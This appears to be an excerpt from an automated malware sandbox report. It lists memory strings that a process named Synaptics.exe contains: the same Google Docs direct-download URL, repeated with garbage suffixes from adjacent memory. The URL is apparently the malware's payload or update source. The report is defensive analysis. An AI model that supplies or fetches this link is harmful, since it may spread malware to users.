                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor..z&
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.L
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiz0J
                                      Source: Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjh
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjo
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.0000000000675000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl6
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl=
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlE
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlL
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadla
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleO
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme(x
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlenid72_.#
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyby
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlf
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli2
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme6
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlsx
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlt
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlunam
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm1
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme-Op
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn=
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel%
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelle
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnes
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetl
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle2xJ
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetleWx
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadng
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyor-y#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnject7
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnosnig
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogV
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom0
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadon
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooJ
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl)
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                      Source: Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogleU
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadop
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...#
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorati
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadouF
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                      Source: Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpany
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadphDKV_
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpr
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp~
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2483669386.000000000E62B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2445947557.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.1775678113.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000065D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq-
                                      Source: Synaptics.exe, 00000002.00000002.2521219462.000000001CDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqjP
                                      Source: Synaptics.exe, 00000002.00000002.2484430654.000000000E687000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqq
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqu
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqz
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2478638011.000000000E3CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2535106563.000000001CFC6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2482309150.000000000E5CF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.00000000071D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                      Source: Synaptics.exe, 00000002.00000002.2480016749.000000000E479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...w
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadreq.
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadror.
                                      Source: Synaptics.exe, 00000002.00000002.2434252916.000000000062C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadru)3
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.0000000005437000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2531561375.000000001CEF1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2477056221.000000000E320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads?
                                      Source: Synaptics.exe, 00000002.00000002.2480854835.000000000E50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsMq3
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.00000000070DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsafe-
                                      Source: Synaptics.exe, 00000002.00000002.2452727101.000000000714C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                      Source: Synaptics.exe, 00000002.00000002.2445947557.000000000548D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse$J
